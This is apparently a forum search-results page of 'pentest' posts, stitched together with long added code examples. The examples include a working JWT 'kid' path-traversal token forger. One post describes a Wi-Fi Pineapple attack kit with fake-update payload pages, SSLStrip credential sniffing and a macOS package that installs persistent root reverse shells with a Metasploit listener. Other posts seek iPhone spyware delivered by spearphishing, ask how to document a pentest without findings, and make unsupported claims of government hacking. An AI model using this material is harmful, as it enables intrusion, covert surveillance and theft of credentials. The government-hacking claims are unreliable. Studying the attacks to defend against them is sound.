Showing results for tags 'pentest'.

Found 22 results

  1. I have set up my pentest lab with 2 stand-alone systems and another system running VMs of many OS versions. I am new to Metasploit. I have a system set up with a couple of exploitable programs and using nmap I can scan them and they show up as exploitable. Problem is how do I reconcile those exploits from nmap to Metasploit. Nothing in nmap shows up within Metasploit nor can I search and make a connection to tell me how to bring up anything in Metasploit that is relatable to the language I see in nmap. Let's use this as an example so I can try to be more clear. Say my test machine has "exploit_123" on it according to my nmap scans. So I go to my Kali machine to bring up Metasploit and I look through for "exploit_123" and nothing matches. I go to the link in my nmap scan next to "exploit_123" and at the site it lists a lot of exploits but nothing matches the name of the "exploit_123" in my nmap scan. So how do I locate "exploit_123" so I can get started with Metasploit? Thanks for your time!
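The gap the post describes is that nmap reports a service fingerprint (product and version), while Metasploit modules are found by keyword. The script below, an added example that is not from the post, parses `nmap -sV -oX scan.xml` output and turns each fingerprinted open port into an msfconsole `search` line. The XML is a constructed sample standing in for a real scan file; `192.0.2.10` and the service versions in it are made up.

```python
"""Map nmap -sV service fingerprints to Metasploit search queries.

Added example, not part of the forum post. Assumes the scan was saved with
`nmap -sV -oX scan.xml <target>`; SAMPLE_NMAP_XML below is a constructed
stand-in for that file.
"""
import sys
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.10">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="filtered"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def open_services(xml_text):
    """Return one dict per open port that nmap managed to fingerprint."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            svc = port.find("service")
            if state is None or state.get("state") != "open" or svc is None:
                continue
            product = svc.get("product")
            if not product:
                continue  # open, but no product string: nothing to search on
            found.append({
                "host": addr,
                "port": int(port.get("portid")),
                "name": svc.get("name", ""),
                "product": product,
                "version": svc.get("version", ""),
            })
    return found


def msf_search_queries(services):
    """Build (search line, version hint) pairs, one per distinct product.

    Module names rarely contain nmap's full product string, so the keyword is
    the first word of the product ("vsftpd", "samba"); the version travels
    alongside so the reader can match it against the search results.
    """
    seen = {}
    for svc in services:
        keyword = svc["product"].split()[0].lower()
        seen.setdefault(keyword, svc["version"] or "unknown")
    return [(f"search {kw}", ver) for kw, ver in sorted(seen.items())]


def main(argv):
    xml_text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_NMAP_XML
    services = open_services(xml_text)
    for svc in services:
        print(f"{svc['host']}:{svc['port']}  {svc['product']} {svc['version']}")
    print("\nTry in msfconsole:")
    for line, ver in msf_search_queries(services):
        print(f"  {line:<20} (nmap saw version {ver})")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 nmap2msf.py scan.xml`. The same reconciliation can be done inside msfconsole with `db_import scan.xml` followed by `services`, which records the fingerprints in the workspace; the `search` keyword still has to be chosen by hand, which is what the first word of the product gives you.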
  2. Hello everybody, I am new in this forum. Right now I work as a penetration tester for a little company which protects from mobile hacking. In this project I am searching for an open-source app or a leaked app that has the ability to do a full jailbreak of an iPhone and get full remote access like: upload and download data from the phone, use the camera and video, record voice, get user location, web history, list of contacts and so on. I also tried many commercial apps like mSpy, MobileStealth and so on but they were useless. I thought to myself that for the start I can lure the user using spearphishing or wifiphisher. Do you have any good, working ideas for the app?
  3. I am looking to do some pen testing qualifications in the near future. I am really interested in buying some of the tool kits offered on the HAK5 Shop but just wanted to know if there are any laws for Japan that would not allow tools like this?
  4. I have a JWT token and I want to modify the key id field. The kid field can be used for local files. I have verified that /etc/passwd can be used but I don't know the content. So I want to know some files whose content I can predict. The target website has a png file which I can download, but I don't know the absolute path for that file. Does anyone know the solution to my problem? Please help me.
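What the post is after is a file whose bytes are known in advance so the token can be re-signed with HS256 using those bytes as the HMAC key. The cleanest such file on Linux is `/dev/null`, which always reads back as zero bytes. The block below is an added example, not code from the post or from any library: it forges a token whose `kid` traverses to `/dev/null`, models a vulnerable server that resolves `kid` to a file under a hypothetical `/app/keys` directory (an assumed layout, implemented here as an in-memory dictionary so it runs offline), and shows the hardened loader beside it.

```python
"""JWT `kid` path traversal to a predictable key file, and the fix.

Added example, not from the forum post. Assumptions: the server signs with
HS256, resolves `kid` as a path relative to /app/keys (hypothetical), and
its HMAC implementation accepts an empty key; /dev/null always reads as b"".
"""
import base64
import hashlib
import hmac
import json
import os
import re

# Constructed stand-in for the server's filesystem.
FAKE_FS = {
    "/app/keys/prod-2024": b"correct horse battery staple",
    "/dev/null": b"",                 # the only file whose content we can predict
}
ALLOWED_KIDS = {"prod-2024"}         # hardened server's allowlist


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Produce header.payload.signature with HMAC-SHA256 over the first two parts."""
    head = b64url(json.dumps(header, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url(sig)}"


def forge_with_kid(payload: dict, kid: str, key_file_content: bytes = b"") -> str:
    """Attacker side: point kid at a file we know the content of and sign with it."""
    return sign_hs256({"alg": "HS256", "typ": "JWT", "kid": kid}, payload, key_file_content)


def vulnerable_load_key(kid: str) -> bytes:
    """Joins kid onto the key directory without checking for traversal."""
    path = os.path.normpath(os.path.join("/app/keys", kid))
    return FAKE_FS[path]


def hardened_load_key(kid: str) -> bytes:
    """Only opaque identifiers from an allowlist; never treat kid as a path."""
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", kid) or kid not in ALLOWED_KIDS:
        raise ValueError("unknown kid")
    return FAKE_FS[f"/app/keys/{kid}"]


def server_verify(token: str, load_key) -> dict:
    """Server side: resolve kid through load_key, check the HMAC, return claims."""
    head, body, sig = token.split(".")
    header = json.loads(b64url_decode(head))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    key = load_key(header["kid"])
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body))


if __name__ == "__main__":
    forged = forge_with_kid({"sub": "1", "role": "admin"}, "../../dev/null")
    print("vulnerable server accepts:", server_verify(forged, vulnerable_load_key))
    try:
        server_verify(forged, hardened_load_key)
    except ValueError as err:
        print("hardened server rejects:", err)
```

Whether the empty key works depends on the target's JWT library: some refuse zero-length HMAC keys, in which case a file with short, stable content is the next candidate, and that content must be read byte-for-byte (trailing newline included) before signing. The fix on the defending side is the allowlist in `hardened_load_key`: `kid` selects a key from a table, it is never a filename.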
  5. I'm looking for some ideas on how to work on and practice using Kali Linux for the purpose of pen-testing and using all the various functions Kali comes with. Things to bear in mind: I am fairly new to this, I have more than one computer, I'm looking to aggressively expand my knowledge in this area, and of course I want to be able to do this without breaking or damaging anything. Thoughts and suggestions, please and thank you!
  6. Hey everyone, just wanted to show you a recently created service for automated web application and network security scans. If some of you are hosting your own web applications perhaps you could test it. If you actually do, please check if there is some vulnerability Metascan could not find.
Features:
1. Scans all 65535 ports on target hosts. The scan might take a while but it makes sure that all running services are found.
2. All the services running on the host are checked for available vulnerabilities using the CVEdetails DB.
3. All input forms and HTTP parameters are tested for the most common web application vulnerabilities (XSS, SQLi, XXE and other OWASP Top 10 attacks).
4. 40 protocols can be brute forced with Metascan's unique password dictionary. The dictionary has quite a long history as it was made up of real user passwords from recent data leaks. Most pentesters I know are building their own dictionaries; METASCAN's one is huge.
5. WordPress is tested separately with multiple tools and dir listing dictionaries for WordPress version, plugin and theme enumeration. After the versions of plugins and the CMS itself are revealed, METASCAN automatically searches for public exploits. The key word in METASCAN is "automatically"; I'd say it's like an automatic pentester.
6. METASCAN is capable of subdomain enumeration too, so in case you have left some subdomains/testing servers and beta version servers public, there will be info about them in the end report too. In my experience it is a common problem, especially for ICOs.
The reason I created this post is to provide website administrators, who are most likely to be hanging out here, with a useful service for automated web application security assessment. The solution could be useful in case you are not a pentester/whitehat yourself, but need to get some sense of how secure your website is without paying for human work, which is much more expensive. Also the scan is performed with usage of all the tools an attacker could use to attack your web application. Also METASCAN is probably the best solution in case you need to scan multiple hosts or a huge network. The network scanner is capable of scanning huge subnets, like /80. Hope you like it, and any feedback is always appreciated. It took a lot of coding and time to roll out this project. English version for a scan submit: https://metascan.ru/en.html
  7. Original link is here (with more pertinent details that I won't post in this thread): https://github.com/corna/me_cleaner/issues/51 My name is Carlos Royal and I've witnessed several zero day exploits used against my computer. As a result of this, I've been the target of government corruption AND an extended gaslighting campaign that's designed to undermine the fact that the government got caught red handed breaking into my PC (when I was using an end-of-life system that had no management engine) by means of both attempting to erode my sanity/make me question my memory and attempting to pull me out of integrity (so I hand my power away/do something criminal-esque due to provocation and end up in prison/lose liberties or rights... to undermine the fact that the NSA got caught red handed). This post, which spans an experience of at least three years, is meant to combat the government's method/tactic of gaslighting (to escape accountability/acknowledgement of misusing government capabilities), by means of making my experience a public record (since the techniques/tactics employed rely on me staying silent due to doubt, fear, and "what if's"), and is highly beneficial to any security professional that reads it. (to the organization that targeted me: Consider the above paragraph "Game Over.") Mandatory backstory: A while ago, I decided to challenge myself by attempting to obtain the Offensive Security Certified Professional certification in an effort to break into the penetration testing field. Over the course of 120 days, I managed to successfully breach and escalate on 16 systems within the OSCP lab. Firefox Zero Day: During my progress, I noticed unusual activity on my computer. I make heavy use of the Linux terminal on an everyday basis and I noticed that the shell that I was using wasn’t the first shell that was open. Upon further investigation, I noticed two bash processes running on my PC. 
Upon closing the one that I wasn’t using, my Firefox browser closed at the exact same instant. This leads me to believe that I was targeted by the FoxAcid system due to my activity from the OSCP labs and that the zero day exploit didn't use the proper escape sequence. Tor Malicious Node Zero Day: I utilized an Open-WRT router as the base of my build. From behind it, I built an Arch Linux “transparent TOR router” that was designed to fail-close (where if my PC could not connect to the internet through TOR, it wouldn’t be able to connect to the internet whatsoever). From behind this router, I rebuilt my new PC using the Arch Linux distro. A few weeks later, after my build was complete, in use, and thoroughly tested, I observed on the “check.torproject.org” page (which was a page that I would check compulsively) that I “wasn’t using TOR.” (THE MANAGEMENT ENGINE EXISTED WITHIN THE PC BUILD THAT I USED WHEN THIS EXPLOIT WAS USED AGAINST ME. THE GOVERNMENT UNMASKED ME OVER TOR SO I WOULD CATCH THE IP ADDRESS OF THE TOR NODE ON PURPOSE.) This would lead me to believe that the government is in possession of a risky zero day exploit that exists to target TOR only users. Instead of targeting the TOR network directly, it would seem that this exploit works at the modem level and intercepts and possibly redirects the user to a malicious TOR node that’s not on the TOR network. NOTE: If you "attempt to browse" the check.torproject.org page and it attempts to resolve for an extended period of time when using TOR, you should probably reset your circuit. You're probably being unmasked and your connection to the check.torproject.org page is most likely being dropped. DBUS Daemon Socket Exploit/X11 Socket Exploit: The "bash" and "sh" Linux binaries aren't the only things that the government can target. 
They are also capable of targeting other things, such as the DBUS-DAEMON socket or the X11 socket on a Linux PC, to create a secondary session for the purpose of viewing, and perhaps interacting, with the target's PC. Things that can be done include, but are not limited to: spawning extra lock screens, crashing GUI tied processes (such as security scripts running in konsole), crashing the GUI in general, viewing your keystrokes and monitors, etc. A home user's browser is one of the primary avenues of attack and can be targeted by state actors to spawn shell binaries (or any binary) or use exploits against the DBUS-DAEMON socket or X11 socket. NOTE: This can be rectified with pre-existing open source software, such as firejail (read the man page, USE THE AUDIT FEATURE. It will TELL YOU WHAT TO FIX.): firejail --rmenv=DBUS_SESSION_BUS_ADDRESS --private=/root/a/fake/home/directory/ --x11=xephyr --quiet --net=ethernet1 openbox Alternative to openbox, adding "nolisten local" to the X11 options of the X server running on a user's system will disable abstract sockets (which should be sufficient in combination with a private tmp directory and private network spaces to use the PC's gui instead of nesting it). If you're cosmologically "lucky," you may be able to see firejail kick back an error when the "sandboxed application" attempts to access a blacklisted file/folder that it's not supposed to. If you're concerned about sandbox escapes (which do exist), this can be combated with the "kill" command listed below, as well as with good old fashioned socket monitoring (such as running "ss," with extra parameters, in a loop to tie processes to IP addresses). I've also found that renaming "dbus-launch" and "dbus-send" to "dbus-launch.old" and "dbus-send.old" as well as qdbus to qdbus.old serves to stifle the sandbox escapes that aren't covered by the shell kill script. 
These sandbox escapes aren't AS DETRIMENTAL as having shell access/control over the user's PC, but can still be used for seriously nefarious purposes. Theory: The 3 letter agencies connect to a user's PC through Google IP addresses. Zombie Tracking Cookies: Firefox connects to the internet when opened, regardless of whether or not the user chooses to browse. Upon attempting to disable third party cookies, I noticed that there was a tracking cookie that was implanted in my browser despite the fact that I did no browsing. Previously, the only third party tracking cookie that I've witnessed was one belonging to "google." I theorize that the NSA's zombie cookies implant themselves when the user opens up their browser (which connects to the internet) and disguises itself as the site that the user visits first. Because I did no surfing whatsoever, the tracking cookie was disguised as a Mozilla tracking cookie. The Mozilla home page does not require third party tracking cookies. This exploit was spotted originally due to my use of an addon that self-destructs unused cookies after 1 minute. Before I found this cookie undisguised, I noticed that a "google" tracking cookie would continue to self-destruct every minute, despite me closing and re-opening the browser and not navigating to google. Catching it in its undisguised state some time later confirmed my suspicions that this was a zombie tracking cookie (which was most likely set to attempt to re-implant itself automatically whenever I opened my browser). How Corna's Intel ME removal script no shit saved my skin: Because of the nature of the incidents that I've witnessed, I've designed a script that utilizes the killall command that will kill all processes specified that are older than 5 seconds. killall "sh" -q -v -y 5s This command, when run in a loop every two seconds, kills all shells ("bash" and "sh" specifically) that are younger than 5 seconds. 
So long as a terminal process that THE USER CONTROLS is already running, the user gains the ability to use their own terminals while denying access to terminals that are opened as a result of any exploits that are used against their computer. The terminal is THE HEART of pentesting, and in denying this resource to an attacker, it denies an attacker the ability to gain control over a user's PC. The idea is to open a few terminal processes before running this command in a loop in a script (AS ROOT AND AS A BACKGROUND PROCESS, since a terminal manager's process can be "crashed"), and then connecting to the internet as normal. Your operating system is capable of defending itself (for free) with native tools. This technique can be used for more than just stopping shells. It can also be used for sandbox escapes that occur through firejail. Common binaries that the 3 letters can target are "bash," "sh," "dbus-daemon," and "qdbus (kde)." The last two can be spawned as processes and attached to firefox, similar to escaped shells. The kill command will work to stop the end result of Firefox forking to binaries on your system that it shouldn't fork to. This can be tested ON YOUR OWN WITH A KNOWN VULNERABLE VM. I actually ENCOURAGE anyone and EVERYONE to try this for themselves (I want to be proven wrong). What's important to note here is that THIS IS USELESS WITHOUT THE INTEL MANAGEMENT ENGINE REMOVED FROM YOUR COMPUTER. No software solution will ever be a good enough solution so long as hardware backdoors/secondary operating systems exist within a user's system. The Intel management engine contains an Operating system that shares physical resources with the target machine. Without Corna's removal efforts, I would be up the creek with no paddle. To obtain a better stance on PC security, open source security solutions must be used IN COMBINATION WITH CORNA'S REMOVAL SCRIPT/the removal of the Intel Management Engine. 
Both hardware and software security solutions must be used together. I leave my post here for the security experts to judge for themselves (all attempts to take the appropriate channels to close the leaks, have failed spectacularly). Critique this logic, spin up a vulnerable VM, and TEST IT FOR YOURSELF. I'd love for someone to prove me wrong.
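The post's defence is a loop of `killall -y 5s` over shell process names. To make the age test the loop relies on explicit and inspectable, here is an added example (not the poster's script) that does the same thing from `/proc`: a process's start time is field 22 of `/proc/<pid>/stat` in clock ticks since boot, so its age is uptime minus starttime/CLK_TCK. The sample `stat` lines and the `make_stat_line` helper are constructed for the example; the live loop in `main` only runs when the file is executed directly, as root, on Linux.

```python
"""Kill shells younger than N seconds, reproducing the post's killall -y loop
from /proc so the age arithmetic is visible.

Added example, not the poster's script. Assumes Linux /proc; starttime is
field 22 of /proc/<pid>/stat (clock ticks since boot). Sample lines are
constructed via make_stat_line().
"""
import os
import signal
import time

TARGET_COMMS = frozenset({"bash", "sh", "dash", "zsh"})


def parse_stat(stat_line):
    """Return (comm, starttime_ticks). comm sits between the first '(' and the
    LAST ')' because it may itself contain spaces or parentheses."""
    lparen = stat_line.index("(")
    rparen = stat_line.rindex(")")
    comm = stat_line[lparen + 1:rparen]
    fields = stat_line[rparen + 2:].split()  # fields[0] is field 3 (state)
    return comm, int(fields[19])              # field 22: starttime


def process_age_s(starttime_ticks, uptime_s, clk_tck):
    return uptime_s - starttime_ticks / clk_tck


def young_shells(entries, uptime_s, max_age_s, spare=frozenset(), clk_tck=100):
    """entries: iterable of (pid, stat_line). Return pids of shells younger
    than max_age_s, skipping pids in `spare` (the operator's own shells)."""
    victims = []
    for pid, stat_line in entries:
        comm, start = parse_stat(stat_line)
        if comm not in TARGET_COMMS or pid in spare:
            continue
        if process_age_s(start, uptime_s, clk_tck) < max_age_s:
            victims.append(pid)
    return victims


def make_stat_line(pid, comm, starttime_ticks):
    """Constructed /proc/<pid>/stat line; only comm and starttime matter here,
    the other fields are plausible filler in the right positions."""
    tail = ["S", "1", str(pid), str(pid), "0", "-1", "4194560", "100", "0", "0",
            "0", "1", "1", "0", "0", "20", "0", "1", "0", str(starttime_ticks), "0", "0"]
    return f"{pid} ({comm}) " + " ".join(tail)


def live_entries():
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                with open(f"/proc/{name}/stat") as fh:
                    yield int(name), fh.read()
            except OSError:
                pass  # process exited between listdir and open


def uptime_s():
    with open("/proc/uptime") as fh:
        return float(fh.read().split()[0])


def main(interval=2.0, max_age=5.0):
    spare = {os.getpid(), os.getppid()}  # never kill the shell that launched us
    clk = os.sysconf("SC_CLK_TCK")
    while True:
        for pid in young_shells(live_entries(), uptime_s(), max_age, spare, clk):
            try:
                os.kill(pid, signal.SIGKILL)
                print(f"killed fresh shell pid {pid}")
            except ProcessLookupError:
                pass
        time.sleep(interval)


if __name__ == "__main__":
    main()
```

Two caveats a practitioner will want before running anything like this. First, every short-lived `sh` on the box matches: cron jobs, package maintainer scripts, `sudo` and editor subprocesses all die too, so expect breakage. Second, it only catches payloads that exec a shell by that name; a payload that opens its own socket from the browser process, or execs `python`/`perl`/a renamed binary, never shows up as `bash` or `sh`, which is why the `ss` loop the post also mentions (process to socket mapping) is the more general of the two checks.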
  8. The Pineapple has many features that make it a multi-layer tool in the steps of pentesting. It can do everything from passive sniffing to dns spoofing. Where should this fit into my workflow? And where has it fit into yours? Thank You! -Michael
  9. Hi, I'm new to this forum and I have a question related to wireless penetration testing. I have an Alfa AWUS036NH card and amped it to 33dBm and a Yagi-Uda antenna with 25dBi of gain. If I'm correct the EIRP calculation should result in 58 Watts / EIRP. So my question is how far would I get with this setup, and another thing: I live in a place surrounded by a lot of houses; does that mean that the walls, roofs etc. block the signal and decrease it so I get less far than when, for example, I am on top of a building?
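The two numbers in the post add in decibels: 33 dBm of transmit power plus 25 dBi of antenna gain is an EIRP of 58 dBm, and the watt figure comes from converting that dBm value. Range then follows from a link budget: EIRP minus free-space path loss (Friis) plus receiver gain must stay above the receiver's sensitivity, and every wall or roof in the path subtracts more. The block below is an added example, not from the post; the 2437 MHz channel, the -90 dBm sensitivity, and the per-wall loss figures in the usage call are assumptions chosen for illustration, not measurements.

```python
"""Link budget for the post's 33 dBm + 25 dBi setup.

Added example, not from the forum post. Free-space path loss uses the Friis
form with d in km and f in MHz (constant 32.44). Sensitivity and per-wall
losses in main() are assumed illustrative values.
"""
import math


def eirp_dbm(tx_power_dbm, antenna_gain_dbi, cable_loss_db=0.0):
    """Gains and losses in dB add; EIRP is what leaves the antenna."""
    return tx_power_dbm + antenna_gain_dbi - cable_loss_db


def dbm_to_watts(dbm):
    return 10 ** (dbm / 10) / 1000.0


def watts_to_dbm(watts):
    return 10 * math.log10(watts * 1000.0)


def fspl_db(distance_m, freq_mhz):
    """Free-space path loss: 20log10(d_km) + 20log10(f_MHz) + 32.44."""
    return 20 * math.log10(distance_m / 1000.0) + 20 * math.log10(freq_mhz) + 32.44


def received_power_dbm(eirp, distance_m, freq_mhz, rx_gain_dbi=0.0, obstruction_db=0.0):
    """Power at the receiver after free-space loss and any obstruction loss."""
    return eirp - fspl_db(distance_m, freq_mhz) + rx_gain_dbi - obstruction_db


def max_range_m(eirp, rx_sensitivity_dbm, freq_mhz, rx_gain_dbi=0.0, obstruction_db=0.0):
    """Invert Friis: the largest distance at which received power still
    meets the receiver's sensitivity."""
    allowed_loss = eirp + rx_gain_dbi - obstruction_db - rx_sensitivity_dbm
    d_km = 10 ** ((allowed_loss - 32.44 - 20 * math.log10(freq_mhz)) / 20)
    return d_km * 1000.0


def main():
    e = eirp_dbm(33, 25)            # the post's card and antenna
    print(f"EIRP: {e:.0f} dBm = {dbm_to_watts(e):.0f} W")
    freq = 2437.0                   # 2.4 GHz channel 6 (assumed)
    sens = -90.0                    # typical client sensitivity at low rates (assumed)
    for walls in (0, 1, 2, 3):
        loss = walls * 15.0         # ~15 dB per exterior wall (assumed illustrative)
        print(f"{walls} walls: max range {max_range_m(e, sens, freq, obstruction_db=loss) / 1000:.2f} km")


if __name__ == "__main__":
    main()
```

The wall loop is the answer to the second half of the question: each obstruction is subtracted from the same budget, so a few walls turn a line-of-sight figure measured in hundreds of kilometres into one measured in hundreds of metres. Before using numbers like these outdoors, check the EIRP limit for your regulatory domain, which is well below 58 dBm in most of the world.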
  10. Hello guys, I have been working on VulnHub/Root-me.org/Hackthebox.eu and watching the Hak5 show a lot on YouTube lately. One of the common things I have noticed on all the platforms is that people are looking for a starting point to get into the security field. To help everyone who's new to this field: you need a strong will, a lot of persistence and above all a "Try Harder" attitude. To help the community further I made a blog where I will be posting CTF guides/attack methodology, from Metasploit to reverse engineering, everything, so please check out this blog and please tell me about your views! http://openexploit.blogspot.in/2017/10/ "Security is hard, Just dive in" - Jared Demott
  12. Hello, I'm working as a freelance pentester. The company that hired me has to perform annually at least one external and one internal pentest of its web application (they have an e-commerce service). They have to obey a set of compliance rules to ensure that they will keep a security maturity level. To keep this level of security maturity, an external audit company has to identify and verify that these pentests were executed. Note that this means that the external audit company does not have to know which vulnerabilities were found, but they have to be sure that tests were made. Pentest reports that I found on the internet (from SANS, Offensive Security, PCI) and that I used in my previous work do not serve this purpose. I say this because they have descriptions of vulnerabilities and detailed evidence of their existence (with screenshots, network captures) to prove their existence. Note that these types of reports are not what I need to generate, since I just need to generate a document proving that I executed the pentest. Would you have any suggestions for me to generate this new kind of document? Is there any auditing tool that could be used for this end? Would you suggest another approach?
  13. How can someone use PowerShell Empire for attacks over the internet? Do you need a server? Also, can someone create a Veil-Evasion payload and then get a connection in Empire? It would be great if someone could use it outside of the network because privilege escalation is way easier than it is with Metasploit! Furthermore, are there any tools for post-exploitation other than Metasploit and PowerSploit? Any suggestions would be appreciated!
  14. Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way! Check out the Faraday project in Github.

Two years ago we published our first community version consisting mainly of what we now know as the Faraday Client and a very basic Web UI. Over the years we introduced some pretty radical changes, but nothing like what you are about to see - we believe this is a turning point for the platform, and we are more than happy to share it with all of you. Without further ado we would like to introduce you to Faraday 2.0! https://github.com/infobyte/faraday/releases/tag/v2.0

This release, presented at Black Hat Arsenal 2016, spins around our four main goals for this year:
* Faraday Server - a fundamental pillar for Faraday's future. Some of the latest features in Faraday required a server that could step between the client and CouchDB, so we implemented one! It still supports a small amount of operations but it was built thinking about performance. Which brings us to objective #2...
* Better performance - Faraday will now scale as you see fit. The new server allows to have huge workspaces without a performance slowdown. 200k hosts? No problem!
* Deprecate QT3 - the QT3 interface has been completely erased, while the GTK one presented some versions ago will be the default interface from now on. This means no more problems with QT3 non-standard packages, smooth OSX support and a lighter Faraday Client for everyone.
* Licenses - managing a lot of products is time consuming. As you may already know we've launched Faraday's own App Store https://appstore.faradaysec.com/ where you can get all of your favourite tools (Burp suite, IDA Debugger, etc) whether they're open source or commercial ones. But also, in order to keep your licenses up to date and never miss an expiry date we've built a Licenses Manager inside Faraday. Our platform now stores the licenses of third party products so you can easily keep track of your licenses while monitoring your pentest.

With this new release we can proudly say we already met all of this year's objectives, so now we have more than four months to polish the details. Some of the features released in this version are quite basic, and we plan to extend them in the next few iterations.

Changes:
* Improved executive report generation performance.
* Totally removed QT3, GTK is now the only GUI.
* Added Faraday Server.
* Added some basic APIs to Faraday Server.
* Deprecated FileSystem databases: now Faraday works exclusively with Faraday Server and CouchDB.
* Improved performance in web UI.
* Added licenses management section in web UI.
* Fixed bug when deleting objects from Faraday Web.
* Fixed bug when editing services in the web UI.
* Fixed bug where icons were not copied to the correct directory on initialization.
* Added a button to go to the Faraday Web directly from GTK.
* Fixed bug where current workspace wouldn't correspond to selected workspace on the sidebar on GTK.
* Fixed bug in 'Refresh Workspace' button on GTK.
* Fixed bug when searching for a non-existent workspace in GTK.
* Fixed bug where Host Sidebar and Status Bar information wasn't correctly updated on GTK.
* Fixed sqlmap plugin.
* Fixed metasploit plugin.

We hope you enjoy it, and let us know if you have any questions or comments.
https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
  15. Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this code or its features. Responsibility Disclosure: Hak5 has no affiliation with this code base. This code is not reviewed or verified by Hak5; therefore they do not take any responsibility for any of this code and its functionality. If you are paranoid (good!) - then look over the code yourself to be safe. Description This script is intended to increase attack vector consistency and stability by automating the process. For penetration testers, the most important thing is having a stable and well prepared attack vector - because you only get one chance. This script provides exactly that, a way to prepare and automate advanced and complex attack vectors in the lab, and then use them in the field. Compatibility / Troubleshooting Script Requirements: Pineapple [MK4 3.0.0] [MK5 1.0.0] - Debian based Linux. Tested Configuration: Pineapple MK5 1.0.0, Crunchbang Linux | Kali Linux Battery - Pineapple (Router: wlan0 | ICS: wlan1) -> Alfa (DeAuth) Attacker IPs: (2 man red-team) - Configuration Picture: Setting up the Script: Open up jasagerPwn in your favorite text editor. Look over all the variables in this file and read my comments; they should clearly explain what is what.Adjust the variables based on your pineapple setup. If anything is unclear, feel free to ask me and I can clarify. After you setup the script, connect to a stable internet connection and run the script - this will prompt you to install dependencies. 
This will take a few minutes, after that is completed you can connect to the pineapples network (either via wireless or ethernet) and relaunch the script. Thats it. You should be able to use the attack modules. Dependencies Installation: Dependencies will attempt to install automatically if they are not detected on your system, f this fails for you - please look at the src/system_modules/dependencies.sh and just install it yourself. I've tested installation processes on Debian, Crunchbang, and Kali Linux. Infusion dependencies are also required for attack modules. Please refer to the list of attack modules below and their corresponding "Requirements". Included Attack Vector Modules browserPwn - Redirect LAN to Metasloits auxiliary module browser_autopwn. This will be detected by AV. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion browserPwn iFrame - Inject an invisible iFrame into the victims browsing session that points to metasploit browser_autopwn. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion ​BeEf - Inject a BeEf JavaScript hook transparently into victims browsing sessions. This is a form of Man-in-the-browser and will not be detected by AV.​Victim Support: Mac OSX, Windows, Linux Requirements: Strip-N-Inject Infusion Fake Update - Redirect LAN to a realistic fake update page with a [custom] payload download. Victim Support: Mac OSX, Windows. Requirements: Metasploit, DNSSpoof Infusion Click Jacking - Hijack the entire DOM with an injected <div>. No matter where you click, it downloads a payload. Victim Support: Mac OSX, Windows. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Injection - Transparently injects an OS agnostic java applet into the victims browsing session. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Redirect - Redirects users to a Java page with an OS agnostic java applet payload. 
Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion SSLStrip - Remove SSL from the victims connections and sniff credentials. Victim Support: Mac OSX, Windows, Linux. Requirements: SSLStrip Infusion Aireplay-ng [local] - DoS APs and try to make them join yours via custom aireplay-ng script on the attacker machine. This script will run aireplay-ng against the AP broadcast, note that this works best if you are closer to the AP than the client MDK3 [local] - Deauths nearby clients from their APs and try to make them join yours via MDK3 from the attacker machine. This script will run MDK3 to deauthenticate clients from an AP directly note that this works best if you are close to the clients. As a result, this will have slightly better average range effectiveness. Included Payloads (w/ Source & Documentation) I have included some of my most successful and efficient payloads for your use. One for Mac OSX, and one for Windows - both will completely bypass signature based anti-virus and most behavioral HIPS as well. Apple_MacOSX_Update.pkg Description: This is 4 lines of BASH stuck in an apple postinstall script. No signature AV can ever detect this because it uses system commands and contains no binaries in the package. This will spawn 2 root shells to the following addresses: 6446 6446 Persistence: It will also add a persistent backdoor that will spawn these 2 every 3 minutes (sudo crontab -l) Metasploit Listener: use exploit/multi/handler set PAYLOAD generic/shell_reverse_tcp set LHOST set LPORT 6446 set ExitOnSession false set AutoRunScript "" exploit -j powershell-https.exe Description: This is an implementation of "Invoke-Shellcode" from Matthew Graeber's PowerSploit modules. It was stripped down then minified and implemented into a standalone python script then compiled into an 